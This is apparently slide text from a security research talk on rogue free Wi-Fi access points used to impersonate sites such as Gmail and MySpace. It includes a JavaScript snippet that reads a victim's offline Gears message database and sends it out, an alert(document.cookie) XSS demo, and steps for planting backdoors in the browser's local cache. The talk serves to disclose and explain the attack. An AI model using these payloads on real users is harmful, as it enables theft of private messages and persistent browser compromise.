1. Lust 2.0 – Desire for free Wi-Fi and the threat of the Imposter Lavakumar Kuppan Security Researcher, Attack and Defense Labs www.andlabs.org

6. GET / HTTP/1.1 Host: gmail.com HTTP 200 OK EVIL CONTENT Browser Phishing Begins GET / HTTP/1.1 Host: myspace.com

7. Phishing the Browser!! Phishing the User Phishing the Browser User identifies a site by its visual appearance Browser identifies a site by its DNS name Attacker creates a site which looks similar to the site he wants to target Attacker controls the DNS and is able to serve content for the DNS name he wants to target User gives away sensitive data Browser gives away sensitive data Abuse user’s trust on the appearance of the site Abuse browser’s trust on the Domain Name of the site Browser cannot identify the attack User cannot identify the attack

16. GET /steal_db HTTP/1.1 Host: myspace.com HTTP 200 OK <script> var db = google.gears.factory.create('beta.database'); db.open('messaging.myspace.com'); var rs = db.execute('select * from messages'); while (rs.isValidRow()) { send_data_to_attacker(); } </script>

20. MySpace Offline DB – Message Author’s name

21. MySpace Offline DB – Message Subject

22. Backdoor injected in Sender’s Name

23. Backdoor Injected in Message Subject

24. For viewing Pleasure – alert(document.cookie);

26. GET / HTTP/1.1 Host: example.com HTTP 200 OK <script> Store ‘/common.js’ in the local resource store </script> /common,js is stored in the local servce

27. GET /common.js HTTP/1.1 Host: example.com HTTP 200 OK Common.js content

33. GET / HTTP/1.1 Host: example.com HTTP 200 OK <script> Store /backdoor.html </script> /backdoor.html is stored in the local servce

34. GET /backdoor.html HTTP/1.1 Host: example.com HTTP 200 OK Backdoor sent